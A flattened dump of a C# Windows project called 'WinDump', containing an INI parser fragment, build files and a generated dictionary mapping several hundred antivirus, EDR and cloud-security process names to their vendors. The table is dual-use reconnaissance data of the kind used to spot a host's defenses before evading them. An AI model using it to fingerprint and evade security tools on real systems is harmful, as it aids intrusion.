trimmedLine.Substring(1, trimmedLine.Length - 2); 209 | if (!sections.ContainsKey(currentSection)) 210 | { 211 | sections[currentSection] = new Dictionary(StringComparer.OrdinalIgnoreCase); 212 | } 213 | continue; 214 | } 215 | 216 | // 处理键值对 217 | int equalsPos = trimmedLine.IndexOf('='); 218 | if (equalsPos > 0 && currentSection != null) 219 | { 220 | string key = trimmedLine.Substring(0, equalsPos).Trim(); 221 | string value = trimmedLine.Substring(equalsPos + 1).Trim(); 222 | sections[currentSection][key] = value; 223 | } 224 | } 225 | } 226 | 227 | public string GetValue(string section, string key) 228 | { 229 | if (sections.ContainsKey(section) && sections[section].ContainsKey(key)) 230 | { 231 | return sections[section][key]; 232 | } 233 | return null; 234 | } 235 | } 236 | 237 | } 238 | -------------------------------------------------------------------------------- /WinDump.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4DC5651B-AC64-449B-BC58-620086193035} 8 | WinExe 9 | WinDump 10 | WinDump 11 | v2.0 12 | 512 13 | true 14 | 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | True 74 | True 75 | Resource.resx 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | ResXFileCodeGenerator 84 | Resource.Designer.cs 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /WinDump.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.13.35931.197 d17.13 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WinDump", "WinDump.csproj", "{4DC5651B-AC64-449B-BC58-620086193035}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {4DC5651B-AC64-449B-BC58-620086193035}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {4DC5651B-AC64-449B-BC58-620086193035}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {4DC5651B-AC64-449B-BC58-620086193035}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {4DC5651B-AC64-449B-BC58-620086193035}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {1B30CAD7-BAFF-45B1-B0D7-8321CD120677} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /av/README.md: -------------------------------------------------------------------------------- 1 | # av检测生成 2 | 3 | 数据来自: 4 | 5 | 执行`python todotnet.py`会生成out.txt -------------------------------------------------------------------------------- /av/out.txt: -------------------------------------------------------------------------------- 1 | static Dictionary av = new Dictionary { 2 | {"aylaunch.exe", "ALYac"}, 3 | {"ayupdate2.exe", "ALYac"}, 4 | {"AYRTSrv.exe", "ALYac"}, 5 | {"AYAgent.exe", "ALYac"}, 6 | {"AVGSvc.exe", "AVG"}, 7 | {"AVGUI.exe", "AVG"}, 8 | {"avgwdsvc.exe", "AVG"}, 9 | {"avg.exe", "AVG"}, 10 | {"avgaurd.exe", "AVG"}, 11 | {"avgemc.exe", "AVG"}, 12 | {"avgrsx.exe", "AVG"}, 13 | {"avgserv.exe", "AVG"}, 14 | {"avgw.exe", "AVG"}, 15 | {"arsm.exe", "Acronis"}, 16 | {"acronis_license_service.exe", "Acronis"}, 17 | {"AdAwareService.exe", "Ad-Aware"}, 18 | {"Ad-Aware.exe", "Ad-Aware"}, 19 | {"AdAware.exe", "Ad-Aware"}, 20 | {"patray.exe", "AhnLab-V3"}, 21 | {"V3Svc.exe", "AhnLab-V3"}, 22 | {"arcavir.exe", "Arcabit"}, 23 | {"arcadc.exe", "Arcabit"}, 24 | {"ArcaVirMaster.exe", "Arcabit"}, 25 | {"ArcaMainSV.exe", "Arcabit"}, 26 | {"ArcaTasksService.exe", "Arcabit"}, 27 | {"ashDisp.exe", "Avast"}, 28 | {"AvastUI.exe", "Avast"}, 29 | {"AvastSvc.exe", "Avast"}, 30 | {"AvastBrowser.exe", "Avast"}, 31 | {"AfwServ.exe", "Avast"}, 32 | {"avcenter.exe", "Avira AntiVirus(小红伞)"}, 33 | {"avguard.exe", "Avira AntiVirus(小红伞)"}, 34 | {"avgnt.exe", "Avira AntiVirus(小红伞)"}, 35 | {"sched.exe", "Avira AntiVirus(小红伞)"}, 36 | {"BaiduSdSvc.exe", "Baidu AntiVirus"}, 37 | {"BaiduSdTray.exe", "Baidu AntiVirus"}, 38 | {"BaiduSd.exe", "Baidu AntiVirus"}, 39 | {"bddownloader.exe", "百度卫士 or Baidu AntiVirus"}, 40 | {"baiduansvx.exe", "百度卫士-主进程 or Baidu AntiVirus"}, 41 | {"Bdagent.exe", "BitDefender"}, 42 | {"BitDefenderCom.exe", "BitDefender"}, 43 | {"vsserv.exe", "BitDefender"}, 44 | {"bdredline.exe", "BitDefender"}, 45 | {"secenter.exe", "BitDefender"}, 46 | {"bdservicehost.exe", "BitDefender"}, 47 | {"BITDEFENDER.exe", "BitDefender"}, 48 | {"BKavService.exe", "Bkav"}, 49 | {"Bka.exe", "Bkav"}, 50 | {"BkavUtil.exe", "Bkav"}, 51 | {"BLuPro.exe", "Bkav"}, 52 | {"QUHLPSVC.exe", "CAT-QuickHeal"}, 53 | {"onlinent.exe", "CAT-QuickHeal"}, 54 | {"sapissvc.exe", "CAT-QuickHeal"}, 55 | {"scanwscs.exe", "CAT-QuickHeal"}, 56 | {"CMCTrayIcon.exe", "CMC"}, 57 | {"freshclam.exe", "ClamAV"}, 58 | {"cpf.exe", "Comodo"}, 59 | {"cavwp.exe", "Comodo"}, 60 | {"ccavsrv.exe", "Comodo"}, 61 | {"cmdvirth.exe", "Comodo"}, 62 | {"csfalconservice.exe", "CrowdStrike Falcon(猎鹰)"}, 63 | {"CSFalconContainer.exe", "CrowdStrike Falcon(猎鹰)"}, 64 | {"CybereasonRansomFree.exe", "Cybereason"}, 65 | {"CybereasonRansomFreeServiceHost.exe", "Cybereason"}, 66 | {"CybereasonAV.exe", "Cybereason"}, 67 | {"CylanceSvc.exe", "Cylance"}, 68 | {"vsedsps.exe", "Cyren"}, 69 | {"vseamps.exe", "Cyren"}, 70 | {"vseqrts.exe", "Cyren"}, 71 | {"drwebcom.exe", "DrWeb"}, 72 | {"spidernt.exe", "DrWeb"}, 73 | {"drwebscd.exe", "DrWeb"}, 74 | {"drweb32w.exe", "DrWeb"}, 75 | {"dwengine.exes", "DrWeb"}, 76 | {"egui.exe", "ESET-NOD32"}, 77 | {"ecls.exe", "ESET-NOD32"}, 78 | {"ekrn.exe", "ESET-NOD32"}, 79 | {"eguiProxy.exe", "ESET-NOD32"}, 80 | {"EShaSrv.exe", "ESET-NOD32"}, 81 | {"tmpfw.exe", "Trend Micro(趋势科技)"}, 82 | {"tmlisten.exe", "Trend Micro(趋势科技)"}, 83 | {"coreServiceShell.exe", "Trend Micro(趋势科技)"}, 84 | {"coreFrameworkHost.exe", "Trend Micro(趋势科技)"}, 85 | {"uiWatchDog.exe", "Trend Micro(趋势科技)"}, 86 | {"TMLISTEN.exe", "Trend Micro(趋势科技)"}, 87 | {"a2guard.exe", "Emsisoft"}, 88 | {"a2free.exe", "Emsisoft"}, 89 | {"a2service.exe", "Emsisoft"}, 90 | {"endgame.exe", "Endgame"}, 91 | {"F-PROT.exe", "F-Prot"}, 92 | {"FProtTray.exe", "F-Prot"}, 93 | {"FPAVServer.exe", "F-Prot"}, 94 | {"f-stopw.exe", "F-Prot"}, 95 | {"f-prot95.exe", "F-Prot"}, 96 | {"f-agnt95.exe", "F-Prot"}, 97 | {"f-secure.exe", "F-Secure"}, 98 | {"fssm32.exe", "F-Secure"}, 99 | {"Fsorsp64.exe", "F-Secure"}, 100 | {"fsavgui.exe", "F-Secure"}, 101 | {"fameh32.exe", "F-Secure"}, 102 | {"fch32.exe", "F-Secure"}, 103 | {"fih32.exe", "F-Secure"}, 104 | {"fnrb32.exe", "F-Secure"}, 105 | {"fsav32.exe", "F-Secure"}, 106 | {"fsma32.exe", "F-Secure"}, 107 | {"fsmb32.exe", "F-Secure"}, 108 | {"xagtnotif.exe", "FireEye(火眼)"}, 109 | {"xagt.exe", "FireEye(火眼)"}, 110 | {"FortiClient.exe", "Fortinet(飞塔)"}, 111 | {"FortiTray.exe", "Fortinet(飞塔)"}, 112 | {"FortiScand.exe", "Fortinet(飞塔)"}, 113 | {"FortiWF.exe", "Fortinet(飞塔)"}, 114 | {"FortiProxy.exe", "Fortinet(飞塔)"}, 115 | {"FortiESNAC.exe", "Fortinet(飞塔)"}, 116 | {"FortiSSLVPNdaemon.exe", "Fortinet(飞塔)"}, 117 | {"FortiTcs.exe", "Fortinet(飞塔)"}, 118 | {"FctSecSvr.exe", "Fortinet(飞塔)"}, 119 | {"AVK.exe", "G Data安全软件客户端 or GData"}, 120 | {"avkcl.exe", "GData"}, 121 | {"avkpop.exe", "GData"}, 122 | {"avkservice.exe", "GData"}, 123 | {"GDScan.exe", "G Data扫描器 or GData"}, 124 | {"AVKWCtl.exe", "GData"}, 125 | {"AVKProxy.exe", "G Data杀毒代理 or GData"}, 126 | {"AVKBackupService.exe", "G Data备份服务 or GData"}, 127 | {"guardxservice.exe", "Ikarus"}, 128 | {"guardxkickoff.exe", "Ikarus"}, 129 | {"KVFW.exe", "Jiangmin"}, 130 | {"KVsrvXP.exe", "Jiangmin"}, 131 | {"KVMonXP.exe", "Jiangmin"}, 132 | {"KVwsc.exe", "Jiangmin"}, 133 | {"K7TSecurity.exe", "K7AntiVirus"}, 134 | {"K7TSMain.Exe", "K7AntiVirus"}, 135 | {"K7TSUpdT.exe", "K7AntiVirus"}, 136 | {"avp.exe", "Kaspersky(卡巴斯基)"}, 137 | {"avpcc.exe", "Kaspersky(卡巴斯基)"}, 138 | {"avpm.exe", "Kaspersky(卡巴斯基)"}, 139 | {"kavpf.exe", "Kaspersky(卡巴斯基)"}, 140 | {"kavfs.exe", "Kaspersky(卡巴斯基)"}, 141 | {"klnagent.exe", "Kaspersky(卡巴斯基)"}, 142 | {"kavtray.exe", "Kaspersky(卡巴斯基)"}, 143 | {"kavfswp.exe", "Kaspersky(卡巴斯基)"}, 144 | {"kaspersky.exe", "Kaspersky(卡巴斯基)"}, 145 | {"SDSystemTray.exe", "Max Secure Software"}, 146 | {"MaxRCSystemTray.exe", "Max Secure Software"}, 147 | {"RCSystemTray.exe", "Max Secure Software"}, 148 | {"MaxAVPlusDM.exe", "Max Secure Software"}, 149 | {"LiveUpdateSD.exe", "Max Secure Software"}, 150 | {"MBAMService.exe", "Malwarebytes"}, 151 | {"mbam.exe", "Malwarebytes"}, 152 | {"mbamtray.exe", "Malwarebytes"}, 153 | {"Mcshield.exe", "McAfee(迈克菲)"}, 154 | {"Tbmon.exe", "McAfee(迈克菲)"}, 155 | {"Frameworkservice.exe", "McAfee(迈克菲)"}, 156 | {"firesvc.exe", "McAfee(迈克菲)"}, 157 | {"firetray.exe", "McAfee(迈克菲)"}, 158 | {"hipsvc.exe", "McAfee(迈克菲)"}, 159 | {"mfevtps.exe", "McAfee(迈克菲)"}, 160 | {"mcafeefire.exe", "McAfee(迈克菲)"}, 161 | {"shstat.exe", "McAfee(迈克菲)"}, 162 | {"vstskmgr.exe", "McAfee(迈克菲)"}, 163 | {"engineserver.exe", "McAfee(迈克菲)"}, 164 | {"alogserv.exe", "McAfee(迈克菲)"}, 165 | {"avconsol.exe", "McAfee(迈克菲)"}, 166 | {"cmgrdian.exe", "McAfee(迈克菲)"}, 167 | {"cpd.exe", "McAfee(迈克菲)"}, 168 | {"mcmnhdlr.exe", "McAfee(迈克菲)"}, 169 | {"mcvsshld.exe", "McAfee(迈克菲)"}, 170 | {"mcvsrte.exe", "McAfee(迈克菲)"}, 171 | {"mghtml.exe", "McAfee(迈克菲)"}, 172 | {"mpfservice.exe", "McAfee(迈克菲)"}, 173 | {"mpfagent.exe", "McAfee(迈克菲)"}, 174 | {"mpftray.exe", "McAfee(迈克菲)"}, 175 | {"vshwin32.exe", "McAfee(迈克菲)"}, 176 | {"vsstat.exe", "McAfee(迈克菲)"}, 177 | {"guarddog.exe", "McAfee(迈克菲)"}, 178 | {"mfeann.exe", "McAfee(迈克菲)"}, 179 | {"udaterui.exe", "McAfee(迈克菲)"}, 180 | {"naprdmgr.exe", "McAfee(迈克菲)"}, 181 | {"mctray.exe", "McAfee(迈克菲)"}, 182 | {"fcagate.exe", "McAfee(迈克菲)"}, 183 | {"fcag.exe", "McAfee(迈克菲)"}, 184 | {"fcags.exe", "McAfee(迈克菲)"}, 185 | {"fcagswd.exe", "McAfee(迈克菲)"}, 186 | {"macompatsvc.exe", "McAfee(迈克菲)"}, 187 | {"masvc.exe", "McAfee(迈克菲)"}, 188 | {"mcamnsvc.exe", "McAfee(迈克菲)"}, 189 | {"mctary.exe", "McAfee(迈克菲)"}, 190 | {"mfecanary.exe", "McAfee(迈克菲)"}, 191 | {"mfeconsole.exe", "McAfee(迈克菲)"}, 192 | {"mfeesp.exe", "McAfee(迈克菲)"}, 193 | {"mfefire.exe", "McAfee(迈克菲)"}, 194 | {"mfefw.exe", "McAfee(迈克菲)"}, 195 | {"mfemms.exe", "McAfee(迈克菲)"}, 196 | {"mfetp.exe", "McAfee(迈克菲)"}, 197 | {"mfewc.exe", "McAfee(迈克菲)"}, 198 | {"mfewch.exe", "McAfee(迈克菲)"}, 199 | {"MsMpEng.exe", "Microsoft Security Essentials"}, 200 | {"msseces.exe", "Microsoft Security Essentials"}, 201 | {"mssecess.exe", "Microsoft Security Essentials"}, 202 | {"emet_agent.exe", "Microsoft Security Essentials"}, 203 | {"emet_service.exe", "Microsoft Security Essentials"}, 204 | {"drwatson.exe", "Microsoft Security Essentials"}, 205 | {"MpCmdRun.exe", "Microsoft Security Essentials"}, 206 | {"NisSrv.exe", "Microsoft Security Essentials"}, 207 | {"MsSense.exe", "Microsoft Security Essentials"}, 208 | {"MSASCui.exe", "Microsoft Security Essentials"}, 209 | {"MSASCuiL.exe", "Microsoft Security Essentials"}, 210 | {"SecurityHealthService.exe", "Microsoft Security Essentials"}, 211 | {"nanoav.exe", "NANO-Antivirus"}, 212 | {"nanoav64.exe", "NANO-Antivirus"}, 213 | {"nanoreport.exe", "NANO-Antivirus"}, 214 | {"nanoreportc.exe", "NANO-Antivirus"}, 215 | {"nanoreportc64.exe", "NANO-Antivirus"}, 216 | {"nanorst.exe", "NANO-Antivirus"}, 217 | {"nanosvc.exe", "NANO-Antivirus"}, 218 | {"PanInstaller.exe", "Palo Alto Networks"}, 219 | {"remupd.exe", "Panda Security"}, 220 | {"apvxdwin.exe", "Panda Security"}, 221 | {"pavproxy.exe", "Panda Security"}, 222 | {"pavsched.exe", "Panda Security"}, 223 | {"360sd.exe", "Qihoo-360"}, 224 | {"360tray.exe", "Qihoo-360"}, 225 | {"ZhuDongFangYu.exe", "Qihoo-360"}, 226 | {"360rp.exe", "Qihoo-360"}, 227 | {"360rps.exe", "Qihoo-360"}, 228 | {"360safe.exe", "Qihoo-360"}, 229 | {"360safebox.exe", "360保险箱 or Qihoo-360"}, 230 | {"QHActiveDefense.exe", "360TotalSecurity(360国际版) or Qihoo-360"}, 231 | {"360skylarsvc.exe", "Qihoo-360"}, 232 | {"LiveUpdate360.exe", "Qihoo-360"}, 233 | {"RavMonD.exe", "Rising"}, 234 | {"rfwmain.exe", "Rising"}, 235 | {"RsMgrSvc.exe", "Rising"}, 236 | {"RavMon.exe", "Rising"}, 237 | {"superantispyware.exe", "SUPERAntiSpyware"}, 238 | {"sascore.exe", "SUPERAntiSpyware"}, 239 | {"SAdBlock.exe", "SUPERAntiSpyware"}, 240 | {"sabsvc.exe", "SUPERAntiSpyware"}, 241 | {"UniversalAVService.exe", "SecureAge APEX"}, 242 | {"EverythingServer.exe", "SecureAge APEX"}, 243 | {"clamd.exe", "SecureAge APEX"}, 244 | {"SavProgress.exe", "Sophos AV"}, 245 | {"icmon.exe", "Sophos AV"}, 246 | {"SavMain.exe", "Sophos AV"}, 247 | {"SophosUI.exe", "Sophos AV"}, 248 | {"SophosFS.exe", "Sophos AV"}, 249 | {"SophosHealth.exe", "Sophos AV"}, 250 | {"SophosSafestore64.exe", "Sophos AV"}, 251 | {"SophosCleanM.exe", "Sophos AV"}, 252 | {"SophosFileScanner.exe", "Sophos AV"}, 253 | {"SophosNtpService.exe", "Sophos AV"}, 254 | {"SophosOsquery.exe", "Sophos AV"}, 255 | {"Sophos UI.exe", "Sophos AV"}, 256 | {"QQPCRTP.exe", "Tencent"}, 257 | {"QQPCTray.exe", "Tencent"}, 258 | {"QQPCMgr.exe", "Tencent"}, 259 | {"QQPCNetFlow.exe", "Tencent"}, 260 | {"QQPCRealTimeSpeedup.exe", "Tencent"}, 261 | {"AMRT.exe", "TotalDefense"}, 262 | {"SWatcherSrv.exe", "TotalDefense"}, 263 | {"Prd.ManagementConsole.exe", "TotalDefense"}, 264 | {"TrapmineEnterpriseService.exe", "Trapmine"}, 265 | {"TrapmineEnterpriseConfig.exe", "Trapmine"}, 266 | {"TrapmineDeployer.exe", "Trapmine"}, 267 | {"TrapmineUpgradeService.exe", "Trapmine"}, 268 | {"TMBMSRV.exe", "TrendMicro"}, 269 | {"ntrtscan.exe", "TrendMicro"}, 270 | {"Pop3Trap.exe", "TrendMicro"}, 271 | {"WebTrap.exe", "TrendMicro"}, 272 | {"PccNTMon.exe", "亚信安全防毒墙网络版 or TrendMicro"}, 273 | {"SBAMSvc.exe", "VIPRE"}, 274 | {"VipreEdgeProtection.exe", "VIPRE"}, 275 | {"SBAMTray.exe", "VIPRE"}, 276 | {"vrmonnt.exe", "ViRobot"}, 277 | {"vrmonsvc.exe", "ViRobot"}, 278 | {"Vrproxyd.exe", "ViRobot"}, 279 | {"npwebroot.exe", "Webroot"}, 280 | {"WRSA.exe", "Webroot"}, 281 | {"spysweeperui.exe", "Webroot"}, 282 | {"Yandex.exe", "Yandex"}, 283 | {"YandexDisk.exe", "Yandex"}, 284 | {"yandesk.exe", "Yandex"}, 285 | {"zillya.exe", "Zillya"}, 286 | {"ZAVAux.exe", "Zillya"}, 287 | {"ZAVCore.exe", "Zillya"}, 288 | {"vsmon.exe", "ZoneAlarm"}, 289 | {"zapro.exe", "ZoneAlarm"}, 290 | {"zonealarm.exe", "ZoneAlarm"}, 291 | {"ZPSTray.exe", "Zoner"}, 292 | {"dasc.exe", "eGambit"}, 293 | {"memscan64.exe", "eGambit"}, 294 | {"dastray.exe", "eGambit"}, 295 | {"consctl.exe", "eScan"}, 296 | {"mwaser.exe", "eScan"}, 297 | {"avpmapp.exe", "eScan"}, 298 | {"AAWTray.exe", "Lavasoft"}, 299 | {"LavasoftTcpService.exe", "Lavasoft"}, 300 | {"AdAwareTray.exe", "Lavasoft"}, 301 | {"WebCompanion.exe", "Lavasoft"}, 302 | {"WebCompanionInstaller.exe", "Lavasoft"}, 303 | {"adawarebp.exe", "Lavasoft"}, 304 | {"ad-watch.exe", "Lavasoft"}, 305 | {"cleaner8.exe", "The Cleaner"}, 306 | {"vba32lder.exe", "VBA32"}, 307 | {"MongoosaGUI.exe", "Mongoosa"}, 308 | {"mongoose.exe", "Mongoosa"}, 309 | {"CorantiControlCenter32.exe", "Coranti2012"}, 310 | {"UnThreat.exe", "UnThreat"}, 311 | {"utsvc.exe", "UnThreat"}, 312 | {"CKSoftShiedAntivirus4.exe", "Shield Antivirus"}, 313 | {"shieldtray.exe", "Shield Antivirus"}, 314 | {"AVWatchService.exe", "VIRUSfighter"}, 315 | {"vfproTray.exe", "VIRUSfighter"}, 316 | {"iptray.exe", "Immunet"}, 317 | {"PSafeSysTray.exe", "PSafe"}, 318 | {"PSafeCategoryFinder.exe", "PSafe"}, 319 | {"psafesvc.exe", "PSafe"}, 320 | {"nspupsvc.exe", "nProtect"}, 321 | {"Npkcmsvc.exe", "nProtect"}, 322 | {"npnj5Agent.exe", "nProtect"}, 323 | {"SpywareTerminatorShield.exe", "Spyware Terminator"}, 324 | {"SpywareTerminator.exe", "Spyware Terminator"}, 325 | {"ccSvcHst.exe", "Norton(赛门铁克)"}, 326 | {"rtvscan.exe", "Norton(赛门铁克)"}, 327 | {"ccapp.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 328 | {"NPFMntor.exe", "Norton(赛门铁克)"}, 329 | {"ccRegVfy.exe", "Norton(赛门铁克)"}, 330 | {"vptray.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 331 | {"iamapp.exe", "Norton(赛门铁克)"}, 332 | {"nav.exe", "Norton(赛门铁克)"}, 333 | {"navapw32.exe", "Norton(赛门铁克)"}, 334 | {"navapsvc.exe", "Norton(赛门铁克)"}, 335 | {"nisum.exe", "Norton(赛门铁克)"}, 336 | {"nmain.exe", "Norton(赛门铁克)"}, 337 | {"nprotect.exe", "Norton(赛门铁克)"}, 338 | {"smcGui.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 339 | {"ns.exe", "Norton(赛门铁克)"}, 340 | {"nortonsecurity.exe", "Norton(赛门铁克)"}, 341 | {"afwServ.exe", "Norton V25(Avast)"}, 342 | {"aswEngSrv.exe", "Norton V25(Avast)"}, 343 | {"aswidsagent.exe", "Norton V25(Avast)"}, 344 | {"AvDump.exe", "Norton V25(Avast)"}, 345 | {"nllToolsSvc.exe", "Norton V25(Avast)"}, 346 | {"NortonSvc.exe", "Norton V25(Avast)"}, 347 | {"wsc_proxy.exe", "Norton V25(Avast)"}, 348 | {"ccSetMgr.exe", "Symantec(赛门铁克)"}, 349 | {"ccpxysvc.exe", "Symantec(赛门铁克)"}, 350 | {"cfgwiz.exe", "Symantec(赛门铁克)"}, 351 | {"smc.exe", "Symantec(赛门铁克)"}, 352 | {"symproxysvc.exe", "Symantec(赛门铁克)"}, 353 | {"vpc32.exe", "Symantec(赛门铁克)"}, 354 | {"lsetup.exe", "Symantec(赛门铁克)"}, 355 | {"luall.exe", "Symantec(赛门铁克)"}, 356 | {"lucomserver.exe", "Symantec(赛门铁克)"}, 357 | {"sbserv.exe", "Symantec(赛门铁克)"}, 358 | {"ccEvtMgr.exe", "Symantec(赛门铁克)"}, 359 | {"snac.exe", "Symantec(赛门铁克)"}, 360 | {"SymCorpUI.exe", "Symantec(赛门铁克)"}, 361 | {"sepWscSvc64.exe", "Symantec(赛门铁克)"}, 362 | {"knsdtray.exe", "可牛杀毒"}, 363 | {"Miner.exe", "流量矿石"}, 364 | {"safedog.exe", "SafeDog(安全狗)"}, 365 | {"SafeDogGuardCenter.exe", "SafeDog(安全狗)"}, 366 | {"SafeDogSiteIIS.exe", "SafeDog(安全狗)"}, 367 | {"SafeDogTray.exe", "SafeDog(安全狗)"}, 368 | {"SafeDogServerUI.exe", "SafeDog(安全狗)"}, 369 | {"SafeDogSiteApache.exe", "SafeDog(安全狗)"}, 370 | {"CloudHelper.exe", "SafeDog(安全狗)"}, 371 | {"SafeDogUpdateCenter.exe", "SafeDog(安全狗)"}, 372 | {"parmor.exe", "木马克星"}, 373 | {"Iparmor.exe", "木马克星"}, 374 | {"beikesan.exe", "贝壳云安全"}, 375 | {"TrojanHunter.exe", "木马猎手"}, 376 | {"GG.exe", "巨盾网游安全盾"}, 377 | {"adam.exe", "绿鹰安全精灵"}, 378 | {"AST.exe", "超级巡警"}, 379 | {"ananwidget.exe", "墨者安全专家"}, 380 | {"FYFireWall.exe", "风云防火墙"}, 381 | {"MPMon.exe", "微点主动防御"}, 382 | {"pfw.exe", "天网防火墙"}, 383 | {"D_Safe_Manage.exe", "D 盾"}, 384 | {"d_manage.exe", "D 盾"}, 385 | {"yunsuo_agent_service.exe", "云锁"}, 386 | {"yunsuo_agent_daemon.exe", "云锁"}, 387 | {"HwsPanel.exe", "护卫神"}, 388 | {"hws_ui.exe", "护卫神"}, 389 | {"hws.exe", "护卫神"}, 390 | {"hwsd.exe", "护卫神"}, 391 | {"HwsHostPanel.exe", "护卫神"}, 392 | {"HwsHostMaster.exe", "护卫神"}, 393 | {"hipstray.exe", "火绒安全"}, 394 | {"wsctrl.exe", "火绒安全"}, 395 | {"usysdiag.exe", "火绒安全"}, 396 | {"HipsDaemon.exe", "火绒安全"}, 397 | {"HipsLog.exe", "火绒安全"}, 398 | {"HipsMain.exe", "火绒安全"}, 399 | {"wsctrlsvc.exe", "火绒安全"}, 400 | {"WEBSCANX.exe", "网络病毒克星"}, 401 | {"SPHINX.exe", "SPHINX防火墙"}, 402 | {"TQClient.exe", "奇安信天擎"}, 403 | {"TQTray.exe", "奇安信天擎"}, 404 | {"QaxEngManager.exe", "奇安信天擎"}, 405 | {"TQDefender.exe", "奇安信天擎"}, 406 | {"avwin.exe", "H+BEDV Datentechnik GmbH"}, 407 | {"avwupsrv.exe", "H+BEDV Datentechnik GmbH"}, 408 | {"blackd.exe", "IBM ISS Proventia"}, 409 | {"rapapp.exe", "IBM ISS Proventia"}, 410 | {"eeyeevnt.exe", "eEye Digital Security"}, 411 | {"blink.exe", "eEye Digital Security"}, 412 | {"cv.exe", "TamoSoft"}, 413 | {"ent.exe", "TamoSoft"}, 414 | {"persfw.exe", "Kerio Personal Firewall"}, 415 | {"wrctrl.exe", "Kerio Personal Firewall"}, 416 | {"Trjscan.exe", "Simplysup"}, 417 | {"PCTAV.exe", "PC Tools AntiVirus"}, 418 | {"pctsGui.exe", "PC Tools AntiVirus"}, 419 | {"vbcmserv.exe", "VirusBuster Professional"}, 420 | {"ClamTray.exe", "ClamWin"}, 421 | {"clamscan.exe", "ClamWin"}, 422 | {"kxetray.exe", "金山毒霸 or 安天智甲"}, 423 | {"kscan.exe", "金山毒霸 or 安天智甲"}, 424 | {"AMediumManager.exe", "安天智甲"}, 425 | {"kismain.exe", "安天智甲"}, 426 | {"CMCNECore.exe", "CMC Endpoint Security"}, 427 | {"cmcepagent.exe", "CMC Endpoint Security"}, 428 | {"cmccore.exe", "CMC Endpoint Security"}, 429 | {"CMCLog.exe", "CMC Endpoint Security"}, 430 | {"CMCFMon.exe", "CMC Endpoint Security"}, 431 | {"kxescore.exe", "金山毒霸"}, 432 | {"kupdata.exe", "金山毒霸"}, 433 | {"kwsprotect64.exe", "金山毒霸"}, 434 | {"kislive.exe", "金山毒霸"}, 435 | {"knewvip.exe", "金山毒霸"}, 436 | {"kxecenter.exe", "金山毒霸"}, 437 | {"kxemain.exe", "金山毒霸"}, 438 | {"KWatch.exe", "金山毒霸"}, 439 | {"KSafeSvc.exe", "金山毒霸"}, 440 | {"KSafeTray.exe", "金山毒霸"}, 441 | {"outpost.exe", "Agnitum outpost (Outpost Firewall)"}, 442 | {"acs.exe", "Agnitum outpost (Outpost Firewall)"}, 443 | {"CynetLauncher.exe", "Cynet"}, 444 | {"CynetDS.exe", "Cynet"}, 445 | {"CynetEPS.exe", "Cynet"}, 446 | {"CynetMS.exe", "Cynet"}, 447 | {"CynetAR.exe", "Cynet"}, 448 | {"CynetGW.exe", "Cynet"}, 449 | {"CynetSD64.exe", "Cynet"}, 450 | {"winlogbeat.exe", "Elastic"}, 451 | {"KSWebShield.exe", "金山网盾"}, 452 | {"kpfwtray.exe", "金山网镖"}, 453 | {"1433.exe", "在扫1433"}, 454 | {"DUB.exe", "在爆破"}, 455 | {"ServUDaemon.exe", "发现S-U"}, 456 | {"baiduSafeTray.exe", "百度卫士"}, 457 | {"avkwctl9.exe", "G Data文件系统实时监控"}, 458 | {"AVKWCTL.exe", "G Data文件系统实时监控"}, 459 | {"SAVMAIN.exe", "Sophos Anti-Virus"}, 460 | {"safeboxTray.exe", "360保险箱"}, 461 | {"Notifier.exe", "亚信安全服务器深度安全防护系统"}, 462 | {"AliYunDun.exe", "阿里云盾"}, 463 | {"AliYunDunUpdate.exe", "阿里云盾"}, 464 | {"aliyun_assist_service.exe", "阿里云盾"}, 465 | {"BaradAgent.exe", "腾讯云安全"}, 466 | {"sgagent.exe", "腾讯云安全"}, 467 | {"YDService.exe", "腾讯云安全"}, 468 | {"YDLive.exe", "腾讯云安全"}, 469 | {"YDEdr.exe", "腾讯云安全"}, 470 | {"360WebSafe.exe", "360主机卫士Web"}, 471 | {"QHSrv.exe", "360主机卫士Web"}, 472 | {"QHWebshellGuard.exe", "360主机卫士Web"}, 473 | {"gov_defence_service.exe", "网防G01"}, 474 | {"gov_defence_daemon.exe", "网防G01"}, 475 | {"PC.exe", "云锁客户端"}, 476 | {"SNDSrvc.exe", "Symantec Shared诺顿邮件防火墙软件"}, 477 | {"USBKiller.exe", "U盘杀毒专家"}, 478 | {"360EntClient.exe", "天擎EDRAgent"}, 479 | {"360EntMisc.exe", "360(奇安信)天擎"}, 480 | {"alisecguard.exe", "阿里云-云盾"}, 481 | {"ALsvc.exe", "Sophos AutoUpdate Service"}, 482 | {"CmsGoAgent.windows-amd64.", "阿里云监控"}, 483 | 